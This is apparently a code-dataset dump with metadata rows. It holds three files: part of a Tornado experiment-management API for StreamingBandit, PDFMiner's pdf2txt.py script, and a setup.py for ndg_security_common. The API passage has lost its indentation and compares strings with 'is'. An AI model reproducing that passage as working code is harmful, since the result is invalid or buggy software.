:raises 401: If the experiment does not belong to this user or the exp_id is wrong.
:raises 401: If user is not logged in or if there is no secure cookie available.
"""
if self.get_current_user():
if self.validate_user_experiment(exp_id):
db = Database()
response = db.get_one_experiment(exp_id)
self.write(json.dumps(response))
else:
raise ExceptionHandler(reason = "Experiment could not be validated.", status_code = 401)
else:
raise ExceptionHandler(reason = "Could not validate user.", status_code = 401)
def delete(self, exp_id):
""" Delete an experiment
+--------------------------------------------------------------------+
| Example |
+====================================================================+
| http://example.com/exp/EXP_ID |
+--------------------------------------------------------------------+
:requires: A secure cookie obtained by logging in.
:param int exp_id: The ID of the experiment to be deleted.
        :returns: A JSON containing the ID of the deleted experiment.
:raises 401: If the experiment does not belong to this user or the exp_id is wrong.
:raises 401: If user is not logged in or if there is no secure cookie available.
"""
if self.get_current_user():
if self.validate_user_experiment(exp_id):
db = Database()
mongo_db = MongoLog()
response = db.delete_experiment(exp_id)
mongo_db.log_deleted_experiment(response)
self.write(json.dumps(response['exp_id']))
else:
raise ExceptionHandler(reason = "Experiment could not be validated.", status_code = 401)
else:
raise ExceptionHandler(reason = "Could not validate user.", status_code = 401)
def put(self, exp_id):
""" Edit an experiment
+--------------------------------------------------------------------+
| Example |
+====================================================================+
| http://example.com/exp/EXP_ID |
| {"name" : NAME, "getcontext" : CODE, "getaction" : CODE, |
| "getreward" : CODE, "setreward" : CODE, "advice_id" : True, |
| "hourly_theta" : True, "delta_hours" : DELTA_HOURS, |
| "default_reward" : DEFAULT_REWARD} |
+--------------------------------------------------------------------+
.. note:: The parameters for the PUT calls have to be posted in the \
body as a JSON object.
:requires: A secure cookie obtained by logging in.
:param string name: Name of the experiment.
:param string get_context (optional): String of python code for get context code.
:param string get_action (optional): String of python code for get action code.
:param string get_reward (optional): String of python code for get reward code.
:param string set_reward (optional): String of python code for set reward code.
:param bool hourly_theta: Bool indicating whether the state of Theta should be stored hourly.
:param bool advice_id: Bool indicating whether the getAdvice and setReward calls should return an advice_id.
:param int delta_hours: If advice_id is True, supply this to give the number of hours that an advice_id should be stored.
:param dict default_reward: If advice_id is True, supply this to give the default reward for advice_id's that are over their delta_hours limit.
:returns: A JSON indicating success.
:raises 401: If the experiment does not belong to this user or the exp_id is wrong.
:raises 401: If user is not logged in or if there is no secure cookie available.
"""
user = self.get_current_user()
if user:
if self.validate_user_experiment(exp_id):
data = tornado.escape.json_decode(self.request.body)
exp_obj = {}
exp_obj["user_id"] = int(user)
exp_obj["name"] = data["name"]
if "get_context" in data:
exp_obj["get_context"] = data["get_context"]
else:
exp_obj["get_context"] = ""
if "get_action" in data:
exp_obj["get_action"] = data["get_action"]
else:
exp_obj["get_action"] = ""
if "get_reward" in data:
exp_obj["get_reward"] = data["get_reward"]
else:
exp_obj["get_reward"] = ""
if "set_reward" in data:
exp_obj["set_reward"] = data["set_reward"]
else:
exp_obj["set_reward"] = ""
exp_obj["hourly_theta"] = data["hourly_theta"]
exp_obj["advice_id"] = data["advice_id"]
if exp_obj["advice_id"] in ["true", "True", "y", "yes"]:
exp_obj["advice_id"] = "True"
else:
exp_obj["advice_id"] = "False"
if exp_obj["advice_id"] is "True":
if 0 <= int(data["delta_hours"]) <= 99999:
exp_obj["delta_hours"] = data["delta_hours"]
else:
raise ExceptionHandler(reason = "Supplied number for delta hours must be between 0 and 99999.", status_code = 400)
exp_obj["default_reward"] = data["default_reward"]
db = Database()
response = {}
response["id"] = db.edit_experiment(exp_obj, exp_id)
self.write(json.dumps(response))
else:
raise ExceptionHandler(reason = "Experiment could not be validated.", status_code = 401)
else:
raise ExceptionHandler(reason = "Could not validate user.", status_code = 401)
class ListDefaults(BaseHandler):
def get(self):
""" Get the list with default available experiments.
+--------------------------------------------------------------------+
| Example |
+====================================================================+
| http://example.com/exp/defaults |
+--------------------------------------------------------------------+
:requires: A secure cookie obtained by logging in.
:returns: A JSON with the default experiments.
:raises 401: If user is not logged in or if there is no secure cookie available.
"""
if self.get_secure_cookie("user"):
folderdata = sorted([f for f in os.listdir("./defaults") if not f.startswith('.')])
folderdata = [x.replace("_"," ") for x in folderdata]
folders = dict(enumerate(folderdata))
self.write(folders)
else:
raise ExceptionHandler(reason = "Could not validate user.", status_code = 401)
class GetDefault(BaseHandler):
def get(self, default_id):
""" Retrieve properties of a default experiment.
+--------------------------------------------------------------------+
| Example |
+====================================================================+
| http://example.com/exp/defaults/DEFAULT_ID |
+--------------------------------------------------------------------+
:requires: A secure cookie obtained by logging in.
:param int default_id: The ID of the default experiment.
:returns: A JSON containing the experiment properties.
:raises 401: If user is not logged in or if there is no secure cookie available.
"""
if self.get_secure_cookie("user"):
folderdata = sorted([f for f in os.listdir("./defaults") if not f.startswith('.')])
folderdata = dict(enumerate(folderdata))
data={}
data["name"] = folderdata[int(default_id)]
filenames = ["get_context", "get_action", "get_reward", "set_reward"]
for filename in filenames:
if os.path.isfile("./defaults/"+data["name"]+"/"+filename+".py"):
data[filename] = open("./defaults/"+data["name"]+"/"+filename+".py").read()
self.write(data)
else:
raise ExceptionHandler(reason = "Could not validate user.", status_code = 401)
class ResetExperiment(BaseHandler):
def get(self, exp_id):
""" Reset the theta of an experiment.
+--------------------------------------------------------------------+
| Example |
+====================================================================+
| http://example.com/exp/EXP_ID/resetexperiment?key=KEY |
| &theta_key=THETA_KEY&theta_value=THETA_VALUE |
+--------------------------------------------------------------------+
:requires: A secure cookie obtained by logging in.
:param int exp_id: The experiment ID.
:param string key: The key of the experiment.
:param string theta_key (optional): The key for theta used when setting \
theta in the setReward and getAction code.
:param string theta_value (optional): The value for theta used when \
setting theta in the setReward and getAction code.
:raises 401: If the theta_key or theta_value does not exist or is not valid.
:raises 401: If the experiment does not belong to this user or the exp_id is wrong.
:raises 401: If user is not logged in or if there is no secure cookie available.
"""
if self.get_secure_cookie("user"):
if self.validate_user_experiment(exp_id):
key = self.get_argument("key", default = False)
theta_key = self.get_argument("theta_key", default = None)
theta_value = self.get_argument("theta_value", default = None)
__EXP__ = Experiment(exp_id, key)
status = __EXP__.delete_theta(key = theta_key, value = theta_value)
if status >= 1:
self.write(json.dumps({'status':'success'}))
else:
raise ExceptionHandler(reason = "Theta_key or theta_value could not be validated.", status_code = 401)
else:
raise ExceptionHandler(reason = "Experiment could not be validated.", status_code = 401)
else:
raise ExceptionHandler(reason = "Could not validate user.", status_code = 401)
class AddUser(BaseHandler):
def post(self):
""" Add a user to StreamingBandit.
+--------------------------------------------------------------------+
| Example |
+====================================================================+
| http://example.com/user |
| {"username" : USERNAME, "password" : PASSWORD} |
+--------------------------------------------------------------------+
.. note:: The parameters for the POST calls have to be posted in the \
body as a JSON object.
:param string username: The preferred username.
:param string password: The preferred password.
:returns: JSON indicating success.
:raises 400: If user with username already exists.
"""
if self.valid_admin():
data = tornado.escape.json_decode(self.request.body)
users = Users()
username = data["username"]
password = data["password"]
user_id = users.create_user(username, password)
if user_id is False:
raise ExceptionHandler(reason = "User already exists.", status_code = 400)
else:
self.write(json.dumps({'status' : 'success'}))
else:
raise ExceptionHandler(reason = "You are not an admin.", status_code = 401)
| mit | 3,692,329,213,822,720,500 | 49.209424 | 151 | 0.4756 | false | 4.863083 | false | false | false |
madhav-datt/spell-check | pdf_text/pdf2txt.py | 1 | 4620 | #
# pdf2txt.py from the FOSS python PDFMiner package
# http://euske.github.io/pdfminer/index.html#pdf2txt
# Extract text from PDF to text files
#
# Has to be run separately with python2.X (not compatible with python3.X)
#
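# Illustrative invocation (run with a Python 2 interpreter that has PDFMiner
# installed):
#   python2 pdf2txt.py -o output.txt input.pdf
#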
import sys
from pdfminer.pdfdocument import PDFDocument
from pdfminer.pdfparser import PDFParser
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.pdfdevice import PDFDevice, TagExtractor
from pdfminer.pdfpage import PDFPage
from pdfminer.converter import XMLConverter, HTMLConverter, TextConverter
from pdfminer.cmapdb import CMapDB
from pdfminer.layout import LAParams
from pdfminer.image import ImageWriter
def main(argv):
import getopt
def usage():
print('usage: %s [-d] [-p pagenos] [-m maxpages] [-P password] [-o output]'
' [-C] [-n] [-A] [-V] [-M char_margin] [-L line_margin] [-W word_margin]'
' [-F boxes_flow] [-Y layout_mode] [-O output_dir] [-R rotation]'
' [-t text|html|xml|tag] [-c codec] [-s scale]'
' file ...' % argv[0])
return 100
try:
(opts, args) = getopt.getopt(argv[1:], 'dp:m:P:o:CnAVM:L:W:F:Y:O:R:t:c:s:')
except getopt.GetoptError:
return usage()
if not args:
return usage()
# debug option
debug = 0
# input option
password = ''
pagenos = set()
maxpages = 0
# output option
outfile = None
outtype = None
imagewriter = None
rotation = 0
layoutmode = 'normal'
codec = 'utf-8'
pageno = 1
scale = 1
caching = True
showpageno = True
laparams = LAParams()
for (k, v) in opts:
if k == '-d':
debug += 1
elif k == '-p':
pagenos.update(int(x) - 1 for x in v.split(','))
elif k == '-m':
maxpages = int(v)
elif k == '-P':
password = v
elif k == '-o':
outfile = v
elif k == '-C':
caching = False
elif k == '-n':
laparams = None
elif k == '-A':
laparams.all_texts = True
elif k == '-V':
laparams.detect_vertical = True
elif k == '-M':
laparams.char_margin = float(v)
elif k == '-L':
laparams.line_margin = float(v)
elif k == '-W':
laparams.word_margin = float(v)
elif k == '-F':
laparams.boxes_flow = float(v)
elif k == '-Y':
layoutmode = v
elif k == '-O':
imagewriter = ImageWriter(v)
elif k == '-R':
rotation = int(v)
elif k == '-t':
outtype = v
elif k == '-c':
codec = v
elif k == '-s':
scale = float(v)
#
PDFDocument.debug = debug
PDFParser.debug = debug
CMapDB.debug = debug
PDFResourceManager.debug = debug
PDFPageInterpreter.debug = debug
PDFDevice.debug = debug
#
rsrcmgr = PDFResourceManager(caching=caching)
if not outtype:
outtype = 'text'
if outfile:
if outfile.endswith('.htm') or outfile.endswith('.html'):
outtype = 'html'
elif outfile.endswith('.xml'):
outtype = 'xml'
elif outfile.endswith('.tag'):
outtype = 'tag'
if outfile:
        outfp = open(outfile, 'w')
else:
outfp = sys.stdout
if outtype == 'text':
device = TextConverter(rsrcmgr, outfp, codec=codec, laparams=laparams,
imagewriter=imagewriter)
elif outtype == 'xml':
device = XMLConverter(rsrcmgr, outfp, codec=codec, laparams=laparams,
imagewriter=imagewriter)
elif outtype == 'html':
device = HTMLConverter(rsrcmgr, outfp, codec=codec, scale=scale,
layoutmode=layoutmode, laparams=laparams,
imagewriter=imagewriter)
elif outtype == 'tag':
device = TagExtractor(rsrcmgr, outfp, codec=codec)
else:
return usage()
for fname in args:
        fp = open(fname, 'rb')
interpreter = PDFPageInterpreter(rsrcmgr, device)
for page in PDFPage.get_pages(fp, pagenos,
maxpages=maxpages, password=password,
caching=caching, check_extractable=True):
page.rotate = (page.rotate + rotation) % 360
interpreter.process_page(page)
fp.close()
device.close()
outfp.close()
return
if __name__ == '__main__':
sys.exit(main(sys.argv))
| gpl-2.0 | 2,343,243,574,910,225,400 | 30.643836 | 87 | 0.540693 | false | 3.77451 | false | false | false |
cedadev/ndg_security_common | setup.py | 1 | 2632 | #!/usr/bin/env python
"""Distribution Utilities setup program for NDG Security Package
NERC Data Grid Project
"""
__author__ = "P J Kershaw"
__date__ = "24/04/06"
__copyright__ = "(C) 2009 Science and Technology Facilities Council"
__license__ = "BSD - see LICENSE file in top-level directory"
__contact__ = "[email protected]"
__revision__ = '$Id$'
# Bootstrap setuptools if necessary.
try:
from setuptools import setup, find_packages
except ImportError:
from ez_setup import use_setuptools
use_setuptools()
from setuptools import setup, find_packages
import sys
import os
# Packages needed for NDG Security
# Note commented out ones fail with PyPI - use explicit link instead
_PKG_DEPENDENCIES = [
'ndg-httpsclient',
'ndg_saml',
'ndg_xacml'
]
# Python 2.5 includes ElementTree by default
if sys.version_info[0:2] < (2, 5):
_PKG_DEPENDENCIES += ['ElementTree', 'cElementTree']
THIS_DIR = os.path.dirname(__file__)
try:
LONG_DESCR = open(os.path.join(THIS_DIR, 'README.md')).read()
except IOError:
LONG_DESCR = """\
NDG Security package for components common to client and server side
====================================================================
NDG Security is the security system originally developed for the UK Natural
Environment Research Council funded NERC DataGrid. It's a system to provide
federated access control and identity management and has been applied for use
with the Earth System Grid Federation.
"""
setup(
name = 'ndg_security_common',
version = '2.5.0',
description = 'NERC DataGrid Security package containing common '
'utilities used by both server and client '
'packages',
long_description = LONG_DESCR,
author = 'Philip Kershaw',
author_email = '[email protected]',
maintainer = 'Philip Kershaw',
maintainer_email = '[email protected]',
url = 'https://github.com/cedadev/ndg_security_common',
license = 'BSD - See LICENCE file for details',
install_requires = _PKG_DEPENDENCIES,
extras_require = {
# M2Crypto is required for SSL Client based validation of OpenID
# Providers
'openid_relying_party_provider_validation': ["M2Crypto"],
},
dependency_links = ["http://dist.ceda.ac.uk/pip/"],
packages = find_packages(),
namespace_packages = ['ndg', 'ndg.security'],
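    # 'ndg' and 'ndg.security' are declared as namespace packages so that other
    # NDG Security distributions can install their own sub-packages under the
    # same 'ndg.security' package tree.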
entry_points = None,
test_suite = 'ndg.security.common.test',
zip_safe = False
)
| bsd-3-clause | 2,917,347,022,940,199,400 | 34.093333 | 79 | 0.628799 | false | 3.518717 | false | false | false |